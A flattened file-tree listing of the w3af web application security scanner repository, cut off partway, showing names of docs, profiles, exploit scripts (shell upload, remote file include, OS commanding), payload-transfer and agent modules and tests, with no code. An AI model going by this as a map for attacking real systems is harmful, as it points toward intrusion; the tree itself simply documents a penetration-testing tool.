├── .gitignore ├── README.md ├── circle.yml ├── doc ├── CHANGELOG ├── CONTRIBUTORS ├── GPL ├── INSTALL ├── README ├── TODO └── sphinx │ ├── Makefile │ ├── advanced-exploitation.rst │ ├── advanced-install.rst │ ├── advanced-tips-tricks.rst │ ├── advanced-use-cases.rst │ ├── api │ ├── exceptions.rst │ ├── index.rst │ ├── kb.rst │ ├── scans.rst │ ├── traffic.rst │ ├── urls.rst │ └── version.rst │ ├── authentication.rst │ ├── basic-ui.rst │ ├── ca-config.rst │ ├── common-use-cases.rst │ ├── conf.py │ ├── contribute.rst │ ├── docker.rst │ ├── exploitation.rst │ ├── gui │ ├── analyzing-results.rst │ ├── configuration.rst │ ├── exploitation.rst │ ├── general-structure.rst │ ├── images │ │ ├── cluster.png │ │ ├── compare-tool.png │ │ ├── encode-decode.png │ │ ├── exploit-all.png │ │ ├── exploit.png │ │ ├── exploiting.png │ │ ├── fuzzy.png │ │ ├── general-structure.png │ │ ├── gui-screenshot-main.png │ │ ├── http-settings.png │ │ ├── knowledge-base.png │ │ ├── log-messages.png │ │ ├── log-tab.png │ │ ├── manual-http.png │ │ ├── misc-settings.png │ │ ├── multiple-exploit.png │ │ ├── new-save.png │ │ ├── pause.png │ │ ├── plugin-config.png │ │ ├── proxy.png │ │ ├── rr-navigator.png │ │ ├── search-help.png │ │ ├── shell.png │ │ ├── site-structure.png │ │ ├── start-pause.png │ │ ├── start-stop-clear.png │ │ ├── status-bar.png │ │ ├── status.png │ │ ├── target-conf.png │ │ ├── tools.png │ │ ├── using-profiles.png │ │ └── wizard.png │ ├── index.rst │ ├── scanning.rst │ └── tools.rst │ ├── images │ ├── github-logo.png │ ├── irc.png │ ├── mailing_list.png │ ├── profile-error.png │ ├── twitter-logo.png │ └── w3af-logo.png │ ├── index.rst │ ├── install.rst │ ├── phases.rst │ ├── report-a-bug.rst │ ├── scan-rest-apis.rst │ ├── scripts.rst │ └── update.rst ├── extras └── docker │ ├── .dockerignore │ ├── Dockerfile │ ├── README.md │ ├── docker-build-local.sh │ ├── docker-build-release.sh │ ├── dockercfg.template │ └── scripts │ ├── common │ ├── __init__.py │ ├── docker_helpers.py │ ├── w3af-docker.prv │ └── w3af-docker.pub │ ├── w3af_api_docker │ ├── w3af_console_docker │ └── w3af_gui_docker ├── profiles ├── OWASP_TOP10.pw3af ├── audit_high_risk.pw3af ├── bruteforce.pw3af ├── empty_profile.pw3af ├── fast_scan.pw3af ├── full_audit.pw3af ├── full_audit_spider_man.pw3af ├── sitemap.pw3af └── web_infrastructure.pw3af ├── result ├── scripts ├── all.w3af ├── allowed_methods.w3af ├── auth_detailed.w3af ├── bing_spider.w3af ├── blind_sqli_detection.w3af ├── cookie_fuzzing.w3af ├── cross_domain.w3af ├── csrf.w3af ├── dav_shell.w3af ├── detect_transparent_proxy.w3af ├── digit_sum.w3af ├── dvwa.w3af ├── eval.w3af ├── eval_shell.w3af ├── exploit_all.w3af ├── exploit_fast.w3af ├── file_upload_shell.w3af ├── filename_xss.w3af ├── frontpage_version.w3af ├── header_fuzzing.w3af ├── html_output.w3af ├── list_all_plugins.w3af ├── local_file_include-payload.w3af ├── local_file_include.w3af ├── login_brute_form_GET.w3af ├── login_brute_password_only.w3af ├── mangle_request.w3af ├── mangle_response.w3af ├── os_commanding-lnx-vdaemon.w3af ├── os_commanding-lnx-w3afAgent.w3af ├── os_commanding.w3af ├── os_commanding_shell.w3af ├── php_sca-payload.w3af ├── profile-fast_scan.w3af ├── remote_file_include_local_ws.w3af ├── remote_file_include_proxy.w3af ├── remote_file_include_shell-xss.w3af ├── remote_file_include_shell.w3af ├── remote_file_include_w3af_site.w3af ├── spider_man.w3af ├── sqli.w3af ├── sqlmap_exploit_int.w3af ├── targets_from_file.w3af ├── web_spider-ignore_regex.w3af ├── web_spider-only_forward.w3af ├── web_spider.w3af ├── xss_simple.w3af └── xss_stored.w3af ├── tools ├── base64decode ├── base64encode ├── gencc ├── md5hash ├── sha1hash ├── urldecode └── urlencode ├── w3af ├── __init__.py ├── core │ ├── __init__.py │ ├── controllers │ │ ├── __init__.py │ │ ├── auto_update │ │ │ ├── __init__.py │ │ │ ├── changelog.py │ │ │ ├── git_client.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_changelog.py │ │ │ │ ├── test_git_client.py │ │ │ │ ├── test_update_utils.py │ │ │ │ └── test_version_manager.py │ │ │ ├── ui_wrapper.py │ │ │ ├── utils.py │ │ │ └── version_manager.py │ │ ├── bruteforce │ │ │ ├── __init__.py │ │ │ ├── bruteforcer.py │ │ │ ├── combo.txt │ │ │ ├── passwords.txt │ │ │ ├── tests │ │ │ │ └── test_bruteforcer.py │ │ │ └── users.txt │ │ ├── ci │ │ │ ├── __init__.py │ │ │ ├── circleci │ │ │ │ ├── __init__.py │ │ │ │ └── trigger-w3af-api-build.py │ │ │ ├── constants.py │ │ │ ├── detect.py │ │ │ ├── helpers │ │ │ │ ├── __init__.py │ │ │ │ ├── router.php │ │ │ │ └── set_root_password.sql │ │ │ ├── install_scripts │ │ │ │ ├── install_c_extensions_venv.sh │ │ │ │ ├── install_core_dependencies.sh │ │ │ │ ├── install_gui_dependencies.sh │ │ │ │ ├── install_test_dependencies.sh │ │ │ │ └── install_wavsep.sh │ │ │ ├── mcir.py │ │ │ ├── moth.py │ │ │ ├── nosetests_wrapper │ │ │ │ ├── __init__.py │ │ │ │ ├── constants.py │ │ │ │ ├── main.py │ │ │ │ ├── show-test-ids.py │ │ │ │ └── utils │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── nosetests.py │ │ │ │ │ ├── output.py │ │ │ │ │ ├── test_stats.py │ │ │ │ │ └── xunit.py │ │ │ ├── only_ci_decorator.py │ │ │ ├── php_moth.py │ │ │ ├── sqlmap_testenv.py │ │ │ ├── utils.py │ │ │ ├── w3af_moth.py │ │ │ ├── wavsep.py │ │ │ └── wivet.py │ │ ├── configurable.py │ │ ├── core_helpers │ │ │ ├── __init__.py │ │ │ ├── consumers │ │ │ │ ├── __init__.py │ │ │ │ ├── audit.py │ │ │ │ ├── auth.py │ │ │ │ ├── base_consumer.py │ │ │ │ ├── bruteforce.py │ │ │ │ ├── constants.py │ │ │ │ ├── crawl_infrastructure.py │ │ │ │ ├── grep.py │ │ │ │ ├── seed.py │ │ │ │ └── tests │ │ │ │ │ ├── test_audit.py │ │ │ │ │ ├── test_base_consumer.py │ │ │ │ │ ├── test_crawl_infrastructure.py │ │ │ │ │ └── test_grep.py │ │ │ ├── exception_handler.py │ │ │ ├── fingerprint_404.py │ │ │ ├── not_found │ │ │ │ ├── __init__.py │ │ │ │ ├── decorators.py │ │ │ │ ├── fuzzy_equal_for_diff.py │ │ │ │ ├── generate_404.py │ │ │ │ ├── get_clean_body.py │ │ │ │ ├── response.py │ │ │ │ └── tests │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── get_404s.py │ │ │ │ │ ├── test_404_fuzzy_string_match.py │ │ │ │ │ ├── test_fingerprint_404.py │ │ │ │ │ ├── test_fingerprint_404_perf.py │ │ │ │ │ ├── test_fuzzy_equal_for_diff.py │ │ │ │ │ ├── test_generate_404_filename.py │ │ │ │ │ ├── test_get_clean_body.py │ │ │ │ │ └── test_response.py │ │ │ ├── plugins.py │ │ │ ├── profiles.py │ │ │ ├── status.py │ │ │ ├── strategy.py │ │ │ ├── strategy_observers │ │ │ │ ├── __init__.py │ │ │ │ ├── disk_space_observer.py │ │ │ │ ├── strategy_observer.py │ │ │ │ ├── tests │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── test_disk_space_observer.py │ │ │ │ │ └── test_thread_state_observer.py │ │ │ │ ├── thread_count_observer.py │ │ │ │ └── thread_state_observer.py │ │ │ ├── target.py │ │ │ └── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_exception_handler.py │ │ │ │ ├── test_plugins.py │ │ │ │ ├── test_profiles.py │ │ │ │ ├── test_status.py │ │ │ │ ├── test_strategy.py │ │ │ │ ├── test_strategy_low_level.py │ │ │ │ └── test_target.py │ │ ├── cors │ │ │ ├── __init__.py │ │ │ ├── tests │ │ │ │ └── test_cors_utils.py │ │ │ └── utils.py │ │ ├── csp │ │ │ ├── __init__.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ └── test_csp_utils.py │ │ │ └── utils.py │ │ ├── daemons │ │ │ ├── __init__.py │ │ │ ├── proxy │ │ │ │ ├── __init__.py │ │ │ │ ├── ca │ │ │ │ │ ├── README.md │ │ │ │ │ ├── mitmproxy-ca-cert.cer │ │ │ │ │ ├── mitmproxy-ca-cert.p12 │ │ │ │ │ ├── mitmproxy-ca-cert.pem │ │ │ │ │ ├── mitmproxy-ca.pem │ │ │ │ │ └── mitmproxy-dhparam.pem │ │ │ │ ├── handler.py │ │ │ │ ├── intercept_handler.py │ │ │ │ ├── intercept_proxy.py │ │ │ │ ├── proxy.py │ │ │ │ ├── templates │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── base.html │ │ │ │ │ ├── drop.html │ │ │ │ │ ├── error.html │ │ │ │ │ ├── spiderman_end.html │ │ │ │ │ └── utils.py │ │ │ │ └── tests │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── test_intercept_proxy.py │ │ │ │ │ └── test_proxy.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ └── test_webserver.py │ │ │ └── webserver.py │ │ ├── delay_detection │ │ │ ├── __init__.py │ │ │ ├── aprox_delay.py │ │ │ ├── aprox_delay_controller.py │ │ │ ├── exact_delay.py │ │ │ ├── exact_delay_controller.py │ │ │ └── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_aprox_delay_controller.py │ │ │ │ └── test_exact_delay_controller.py │ │ ├── dependency_check │ │ │ ├── __init__.py │ │ │ ├── dependency_check.py │ │ │ ├── external │ │ │ │ ├── __init__.py │ │ │ │ └── retirejs.py │ │ │ ├── helper_requirements_txt.py │ │ │ ├── helper_script.py │ │ │ ├── lazy_load.py │ │ │ ├── pip_dependency.py │ │ │ ├── platforms │ │ │ │ ├── __init__.py │ │ │ │ ├── base_platform.py │ │ │ │ ├── centos.py │ │ │ │ ├── centos65.py │ │ │ │ ├── current_platform.py │ │ │ │ ├── debian76.py │ │ │ │ ├── debian78.py │ │ │ │ ├── debian80.py │ │ │ │ ├── default.py │ │ │ │ ├── elementaryOS02.py │ │ │ │ ├── fedora.py │ │ │ │ ├── kali.py │ │ │ │ ├── kali2.py │ │ │ │ ├── mac.py │ │ │ │ ├── openbsd.py │ │ │ │ ├── suse.py │ │ │ │ ├── tests │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── test_all_platforms.py │ │ │ │ │ └── test_current_platform.py │ │ │ │ ├── ubuntu1204.py │ │ │ │ ├── ubuntu1404.py │ │ │ │ ├── ubuntu1410.py │ │ │ │ ├── ubuntu1604.py │ │ │ │ └── ubuntu1804.py │ │ │ ├── requirements.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_dependencies.py │ │ │ │ ├── test_dependency_check.py │ │ │ │ ├── test_helper_requirements_txt.py │ │ │ │ └── test_latest_vulndb.py │ │ │ └── utils.py │ │ ├── easy_contribution │ │ │ ├── __init__.py │ │ │ ├── github_issues.py │ │ │ └── tests │ │ │ │ ├── __init__.py │ │ │ │ └── test_github_issues.py │ │ ├── exception_handling │ │ │ ├── __init__.py │ │ │ ├── cleanup_bug_report.py │ │ │ ├── helpers.py │ │ │ └── tests │ │ │ │ ├── __init__.py │ │ │ │ └── test_cleanup_bug_report.py │ │ ├── exceptions.py │ │ ├── extrusion_scanning │ │ │ ├── __init__.py │ │ │ ├── client │ │ │ │ ├── __init__.py │ │ │ │ └── extrusionClient.py │ │ │ ├── extrusionScanner.py │ │ │ ├── server │ │ │ │ ├── __init__.py │ │ │ │ └── extrusionServer.py │ │ │ └── tests │ │ │ │ ├── __init__.py │ │ │ │ └── test_extrusion_scanner.py │ │ ├── intrusion_tools │ │ │ ├── __init__.py │ │ │ ├── atHandler.py │ │ │ ├── crontabHandler.py │ │ │ ├── delayedExecution.py │ │ │ ├── delayedExecutionFactory.py │ │ │ ├── execMethodHelpers.py │ │ │ ├── readMethodHelpers.py │ │ │ └── tests │ │ │ │ └── test_execMethodHelpers.py │ │ ├── javascript │ │ │ ├── __init__.py │ │ │ └── phantomjs │ │ │ │ ├── README.md │ │ │ │ ├── events.js │ │ │ │ ├── extractors.js │ │ │ │ ├── headers.js │ │ │ │ ├── render.js │ │ │ │ └── utils.js │ │ ├── misc │ │ │ ├── __init__.py │ │ │ ├── common_attack_methods.py │ │ │ ├── contains_source_code.py │ │ │ ├── decorators.py │ │ │ ├── diff.py │ │ │ ├── dns_cache.py │ │ │ ├── epoch_to_string.py │ │ │ ├── exploit_all.py │ │ │ ├── factory.py │ │ │ ├── file_lock.py │ │ │ ├── fuzzy_string_cmp.py │ │ │ ├── get_file_list.py │ │ │ ├── get_local_ip.py │ │ │ ├── get_net_iface.py │ │ │ ├── get_unused_port.py │ │ │ ├── get_w3af_version.py │ │ │ ├── group_by_min_key.py │ │ │ ├── home_dir.py │ │ │ ├── human_number.py │ │ │ ├── io.py │ │ │ ├── is_ip_address.py │ │ │ ├── is_private_site.py │ │ │ ├── itertools_toolset.py │ │ │ ├── make_leet.py │ │ │ ├── number_generator.py │ │ │ ├── safe_deepcopy.py │ │ │ ├── temp_dir.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── data │ │ │ │ │ ├── code-detect-false-positive.jpg │ │ │ │ │ ├── source.xml │ │ │ │ │ └── target.xml │ │ │ │ ├── test_common_attack_methods.py │ │ │ │ ├── test_contains_source_code.py │ │ │ │ ├── test_diff.py │ │ │ │ ├── test_diff_performance.py │ │ │ │ ├── test_fuzzy_string_cmp.py │ │ │ │ ├── test_get_w3af_version.py │ │ │ │ ├── test_io.py │ │ │ │ ├── test_is_ip_address.py │ │ │ │ ├── test_is_private_site.py │ │ │ │ ├── test_make_leet.py │ │ │ │ └── test_which.py │ │ │ ├── traceback_utils.py │ │ │ ├── webroot.py │ │ │ ├── which.py │ │ │ └── xunit.py │ │ ├── misc_settings.py │ │ ├── output_manager │ │ │ ├── __init__.py │ │ │ ├── log_sink.py │ │ │ ├── manager.py │ │ │ └── tests │ │ │ │ ├── __init__.py │ │ │ │ └── test_output_manager.py │ │ ├── payload_transfer │ │ │ ├── __init__.py │ │ │ ├── base_payload_transfer.py │ │ │ ├── clientless_reverse_http.py │ │ │ ├── echo_linux.py │ │ │ ├── echo_windows.py │ │ │ ├── payload_transfer_factory.py │ │ │ ├── reverse_ftp.py │ │ │ ├── reverse_ftp_client.py │ │ │ └── tests │ │ │ │ ├── test_clientless_reverse_http.py │ │ │ │ └── test_echo_linux.py │ │ ├── plugins │ │ │ ├── __init__.py │ │ │ ├── attack_plugin.py │ │ │ ├── audit_plugin.py │ │ │ ├── auth_plugin.py │ │ │ ├── auth_session_plugin.py │ │ │ ├── bruteforce_plugin.py │ │ │ ├── crawl_plugin.py │ │ │ ├── evasion_plugin.py │ │ │ ├── grep_plugin.py │ │ │ ├── infrastructure_plugin.py │ │ │ ├── mangle_plugin.py │ │ │ ├── output_plugin.py │ │ │ ├── plugin.py │ │ │ └── tests │ │ │ │ ├── test_404_errors.py │ │ │ │ ├── test_audit_plugin.py │ │ │ │ └── test_plugin.py │ │ ├── profiling │ │ │ ├── README.md │ │ │ ├── __init__.py │ │ │ ├── calculate_eta_adjustments.py │ │ │ ├── core_stats.py │ │ │ ├── cpu_usage.py │ │ │ ├── extract_http_from_log.py │ │ │ ├── memory_usage.py │ │ │ ├── processes.py │ │ │ ├── psutil_stats.py │ │ │ ├── pytracemalloc.py │ │ │ ├── scan_log_analysis │ │ │ │ ├── __init__.py │ │ │ │ ├── data │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── bruteforce.py │ │ │ │ │ ├── consumer_join_times.py │ │ │ │ │ ├── crawl_graph.py │ │ │ │ │ ├── crawling_stats.py │ │ │ │ │ ├── dbms_queue_size_exceeded.py │ │ │ │ │ ├── errors.py │ │ │ │ │ ├── file_sizes.py │ │ │ │ │ ├── freeze_locations.py │ │ │ │ │ ├── http_errors.py │ │ │ │ │ ├── http_requests.py │ │ │ │ │ ├── known_problems.py │ │ │ │ │ ├── not_found_requests.py │ │ │ │ │ ├── scan_finished_in.py │ │ │ │ │ └── wall_time.py │ │ │ │ ├── graphs │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── active_threads.py │ │ │ │ │ ├── audit_queue_size.py │ │ │ │ │ ├── connection_pool_wait.py │ │ │ │ │ ├── consumer_pool_size.py │ │ │ │ │ ├── crawl_queue_size.py │ │ │ │ │ ├── grep_queue_size.py │ │ │ │ │ ├── http_requests_over_time.py │ │ │ │ │ ├── not_found_cache_rate.py │ │ │ │ │ ├── not_found_requests.py │ │ │ │ │ ├── parser_errors.py │ │ │ │ │ ├── parser_memory_limit.py │ │ │ │ │ ├── progress_delta.py │ │ │ │ │ ├── rtt.py │ │ │ │ │ ├── rtt_histogram.py │ │ │ │ │ ├── should_grep_stats.py │ │ │ │ │ ├── timeout.py │ │ │ │ │ ├── urllib_error_rate.py │ │ │ │ │ └── worker_pool_size.py │ │ │ │ ├── main │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── main.py │ │ │ │ │ └── watch.py │ │ │ │ ├── scan_log_analysis.py │ │ │ │ └── utils │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── graph.py │ │ │ │ │ ├── output.py │ │ │ │ │ └── utils.py │ │ │ ├── send-request-record-rtt.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_thread_time.py │ │ │ │ └── test_took_helper.py │ │ │ ├── thread_activity.py │ │ │ ├── thread_time.py │ │ │ ├── took_helper.py │ │ │ └── utils │ │ │ │ ├── __init__.py │ │ │ │ └── ps_mem.py │ │ ├── sca │ │ │ ├── __init__.py │ │ │ ├── sca.py │ │ │ └── tests │ │ │ │ ├── __init__.py │ │ │ │ └── test_sca.py │ │ ├── sql_tools │ │ │ ├── __init__.py │ │ │ ├── blind_sqli_response_diff.py │ │ │ └── blind_sqli_time_delay.py │ │ ├── tests │ │ │ ├── __init__.py │ │ │ ├── core_test_suite │ │ │ │ ├── __init__.py │ │ │ │ ├── test_core_exceptions.py │ │ │ │ ├── test_exception_handler.py │ │ │ │ ├── test_history_access.py │ │ │ │ ├── test_multiple_instances.py │ │ │ │ └── test_pause_stop.py │ │ │ ├── count.py │ │ │ ├── exception_raise.py │ │ │ ├── pylint.rc │ │ │ ├── pylint_plugins │ │ │ │ ├── __init__.py │ │ │ │ ├── decorator.py │ │ │ │ ├── gi_repository_fix.py │ │ │ │ ├── hashlib_fix.py │ │ │ │ ├── httpretty_fix.py │ │ │ │ ├── ordereddict_fix.py │ │ │ │ ├── scapy_fix.py │ │ │ │ └── subprocess_fix.py │ │ │ ├── running_tests.py │ │ │ ├── test_misc_settings.py │ │ │ ├── test_pylint.py │ │ │ ├── test_special_chars.py │ │ │ └── test_w3af_gui.py │ │ ├── threads │ │ │ ├── __init__.py │ │ │ ├── decorators.py │ │ │ ├── is_main_process.py │ │ │ ├── is_main_thread.py │ │ │ ├── monkey_patch_debug.py │ │ │ ├── pool276.py │ │ │ ├── queues.py │ │ │ ├── silent_joinable_queue.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_is_main_process.py │ │ │ │ ├── test_is_main_thread.py │ │ │ │ ├── test_pebble_limit_memory_usage.py │ │ │ │ ├── test_return_args.py │ │ │ │ └── test_threadpool.py │ │ │ └── threadpool.py │ │ ├── vdaemon │ │ │ ├── __init__.py │ │ │ ├── dump.py │ │ │ ├── elf.py │ │ │ ├── lnxVd.py │ │ │ ├── pe.py │ │ │ ├── pe_template.dat │ │ │ ├── tiny-elf.asm │ │ │ ├── tiny.asm │ │ │ ├── vdFactory.py │ │ │ ├── vdaemon.py │ │ │ └── winVd.py │ │ ├── w3afAgent │ │ │ ├── AESSocket.py │ │ │ ├── __init__.py │ │ │ ├── client │ │ │ │ ├── __init__.py │ │ │ │ └── w3afAgentClient.py │ │ │ ├── server │ │ │ │ ├── __init__.py │ │ │ │ └── w3afAgentServer.py │ │ │ └── w3afAgentManager.py │ │ ├── w3afCore.py │ │ ├── websocket │ │ │ ├── __init__.py │ │ │ └── utils.py │ │ └── wizard │ │ │ ├── __init__.py │ │ │ ├── question.py │ │ │ ├── questions │ │ │ ├── __init__.py │ │ │ ├── question_infrastructure_1.py │ │ │ ├── question_infrastructure_2.py │ │ │ ├── question_infrastructure_3.py │ │ │ ├── question_infrastructure_4.py │ │ │ ├── question_infrastructure_internet_1.py │ │ │ ├── question_target_1.py │ │ │ └── question_target_2.py │ │ │ ├── tests │ │ │ ├── __init__.py │ │ │ ├── test_questions.py │ │ │ └── test_wizards.py │ │ │ ├── wizard.py │ │ │ └── wizards │ │ │ ├── __init__.py │ │ │ ├── infrastructure.py │ │ │ └── short_wizard.py │ ├── data │ │ ├── __init__.py │ │ ├── bloomfilter │ │ │ ├── __init__.py │ │ │ ├── bloomfilter.py │ │ │ ├── scalable_bloom.py │ │ │ ├── seekfile_bloom.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── generic_filter_test.py │ │ │ │ ├── test_bloomfilter_impl_selection.py │ │ │ │ ├── test_cmmap_bloom.py │ │ │ │ ├── test_scalable_bloom.py │ │ │ │ ├── test_scalable_performance.py │ │ │ │ └── test_seekfile_bloom.py │ │ │ └── wrappers.py │ │ ├── constants │ │ │ ├── __init__.py │ │ │ ├── browsers.py │ │ │ ├── common_directories.py │ │ │ ├── common_words.py │ │ │ ├── cookies.py │ │ │ ├── dbms.py │ │ │ ├── disclaimer.py │ │ │ ├── encodings.py │ │ │ ├── file_extensions.py │ │ │ ├── file_patterns.py │ │ │ ├── file_templates │ │ │ │ ├── README │ │ │ │ ├── __init__.py │ │ │ │ ├── file_templates.py │ │ │ │ ├── template.bmp │ │ │ │ ├── template.gif │ │ │ │ ├── template.html │ │ │ │ ├── template.jpg │ │ │ │ ├── template.png │ │ │ │ ├── template.txt │ │ │ │ └── tests │ │ │ │ │ └── test_file_templates.py │ │ │ ├── http_messages.py │ │ │ ├── ignored_params.py │ │ │ ├── ports.py │ │ │ ├── response_codes.py │ │ │ ├── severity.py │ │ │ ├── tests │ │ │ │ ├── test_all.py │ │ │ │ ├── test_common_directories.py │ │ │ │ └── test_vulns.py │ │ │ ├── version.txt │ │ │ ├── vulns.py │ │ │ └── websockets.py │ │ ├── context │ │ │ ├── __init__.py │ │ │ ├── constants.py │ │ │ ├── context │ │ │ │ ├── __init__.py │ │ │ │ ├── base.py │ │ │ │ ├── css.py │ │ │ │ ├── html.py │ │ │ │ ├── javascript.py │ │ │ │ └── main.py │ │ │ └── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── context_test.py │ │ │ │ ├── samples │ │ │ │ └── django-500.html │ │ │ │ ├── test_css.py │ │ │ │ ├── test_html.py │ │ │ │ ├── test_html_css.py │ │ │ │ ├── test_html_javascript.py │ │ │ │ └── test_javascript.py │ │ ├── db │ │ │ ├── __init__.py │ │ │ ├── cached_disk_dict.py │ │ │ ├── clean_dc.py │ │ │ ├── dbms.py │ │ │ ├── disk_deque.py │ │ │ ├── disk_dict.py │ │ │ ├── disk_item.py │ │ │ ├── disk_list.py │ │ │ ├── disk_set.py │ │ │ ├── history.py │ │ │ ├── startup_cfg.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── serialization_perf.py │ │ │ │ ├── shelve_vs_sqlite3.py │ │ │ │ ├── test_cached_disk_dict.py │ │ │ │ ├── test_dbms.py │ │ │ │ ├── test_disk_deque.py │ │ │ │ ├── test_disk_dict.py │ │ │ │ ├── test_disk_list.py │ │ │ │ ├── test_disk_set.py │ │ │ │ ├── test_history.py │ │ │ │ ├── test_startup_cfg.py │ │ │ │ ├── test_url_tree.py │ │ │ │ └── test_variant_db.py │ │ │ ├── url_tree.py │ │ │ ├── variant_db.py │ │ │ └── where_helper.py │ │ ├── dc │ │ │ ├── __init__.py │ │ │ ├── cookie.py │ │ │ ├── factory.py │ │ │ ├── generic │ │ │ │ ├── __init__.py │ │ │ │ ├── data_container.py │ │ │ │ ├── form.py │ │ │ │ ├── kv_container.py │ │ │ │ ├── nr_kv_container.py │ │ │ │ ├── plain.py │ │ │ │ └── tests │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── test_data_container.py │ │ │ │ │ ├── test_form.py │ │ │ │ │ ├── test_kv_container.py │ │ │ │ │ ├── test_nr_kv_container.py │ │ │ │ │ └── test_plain.py │ │ │ ├── headers.py │ │ │ ├── json_container.py │ │ │ ├── multipart_container.py │ │ │ ├── query_string.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── samples │ │ │ │ │ └── post-data-3570 │ │ │ │ ├── test_cookie.py │ │ │ │ ├── test_data_container_subclasses.py │ │ │ │ ├── test_factory.py │ │ │ │ ├── test_headers.py │ │ │ │ ├── test_json_container.py │ │ │ │ ├── test_multipart.py │ │ │ │ ├── test_query_string.py │ │ │ │ ├── test_urlencoded_form.py │ │ │ │ └── test_xmlrpc.py │ │ │ ├── urlencoded_form.py │ │ │ ├── utils │ │ │ │ ├── __init__.py │ │ │ │ ├── file_token.py │ │ │ │ ├── filter_printable.py │ │ │ │ ├── json_encoder.py │ │ │ │ ├── json_iter_setters.py │ │ │ │ ├── multipart.py │ │ │ │ ├── tests │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── test_json_iter_setters.py │ │ │ │ │ ├── test_multipart.py │ │ │ │ │ └── test_token.py │ │ │ │ └── token.py │ │ │ └── xmlrpc.py │ │ ├── export │ │ │ ├── __init__.py │ │ │ ├── ajax_export.py │ │ │ ├── html_export.py │ │ │ ├── python_export.py │ │ │ ├── ruby_export.py │ │ │ └── tests │ │ │ │ ├── test_ajax_export.py │ │ │ │ ├── test_html_export.py │ │ │ │ ├── test_python_export.py │ │ │ │ └── test_ruby_export.py │ │ ├── fuzzer │ │ │ ├── __init__.py │ │ │ ├── form_filler.py │ │ │ ├── fuzzer.py │ │ │ ├── mutants │ │ │ │ ├── __init__.py │ │ │ │ ├── cookie_mutant.py │ │ │ │ ├── empty_mutant.py │ │ │ │ ├── filecontent_mutant.py │ │ │ │ ├── filename_mutant.py │ │ │ │ ├── headers_mutant.py │ │ │ │ ├── json_mutant.py │ │ │ │ ├── mutant.py │ │ │ │ ├── postdata_mutant.py │ │ │ │ ├── querystring_mutant.py │ │ │ │ ├── tests │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── test_cookie_mutant.py │ │ │ │ │ ├── test_empty_mutant.py │ │ │ │ │ ├── test_filecontent_mutant.py │ │ │ │ │ ├── test_filename_mutant.py │ │ │ │ │ ├── test_headers_mutants.py │ │ │ │ │ ├── test_json_mutant.py │ │ │ │ │ ├── test_mutant.py │ │ │ │ │ ├── test_postdata_mutant.py │ │ │ │ │ ├── test_querystring_mutant.py │ │ │ │ │ ├── test_urlparts_mutant.py │ │ │ │ │ └── test_xmlrpc_mutant.py │ │ │ │ ├── urlparts_mutant.py │ │ │ │ └── xmlrpc_mutant.py │ │ │ ├── tests │ │ │ │ ├── test_form_filler.py │ │ │ │ ├── test_fuzzer.py │ │ │ │ └── test_fuzzer_utils.py │ │ │ └── utils.py │ │ ├── kb │ │ │ ├── __init__.py │ │ │ ├── config.py │ │ │ ├── exec_shell.py │ │ │ ├── exploit_result.py │ │ │ ├── info.py │ │ │ ├── info_set.py │ │ │ ├── kb_observer.py │ │ │ ├── kb_url_extensions.py │ │ │ ├── knowledge_base.py │ │ │ ├── proxy.py │ │ │ ├── read_shell.py │ │ │ ├── shell.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_exec_shell.py │ │ │ │ ├── test_info.py │ │ │ │ ├── test_info_set.py │ │ │ │ ├── test_knowledge_base.py │ │ │ │ ├── test_read_shell.py │ │ │ │ ├── test_update_urls_in_kb.py │ │ │ │ └── test_vuln.py │ │ │ ├── vuln.py │ │ │ └── vuln_templates │ │ │ │ ├── __init__.py │ │ │ │ ├── base_template.py │ │ │ │ ├── dav_template.py │ │ │ │ ├── eval_template.py │ │ │ │ ├── file_upload_template.py │ │ │ │ ├── local_file_read_template.py │ │ │ │ ├── os_commanding_template.py │ │ │ │ ├── rfi_template.py │ │ │ │ ├── sql_injection_template.py │ │ │ │ ├── tests │ │ │ │ ├── test_base_template.py │ │ │ │ ├── test_dav_template.py │ │ │ │ └── test_template_utils.py │ │ │ │ ├── utils.py │ │ │ │ └── xpath_template.py │ │ ├── misc │ │ │ ├── __init__.py │ │ │ ├── base64_nopadding.py │ │ │ ├── cached_queue.py │ │ │ ├── constants │ │ │ │ ├── __init__.py │ │ │ │ └── web_encodings.py │ │ │ ├── cookie_jar.py │ │ │ ├── cpickle_dumps.py │ │ │ ├── cvss.py │ │ │ ├── dotdict.py │ │ │ ├── encoding.py │ │ │ ├── file_utils.py │ │ │ ├── greek.py │ │ │ ├── mask_password.py │ │ │ ├── ordered_cached_queue.py │ │ │ ├── progress.py │ │ │ ├── python2x3.py │ │ │ ├── response_cache_key.py │ │ │ ├── smart_queue.py │ │ │ ├── tests │ │ │ │ ├── test_cached_queue.py │ │ │ │ ├── test_dir │ │ │ │ │ └── README.md │ │ │ │ ├── test_encoding.py │ │ │ │ ├── test_file_utils.py │ │ │ │ ├── test_mask_password.py │ │ │ │ ├── test_ordered_cached_queue.py │ │ │ │ ├── test_smart_queue.py │ │ │ │ └── test_xml_bones.py │ │ │ ├── web_encodings.py 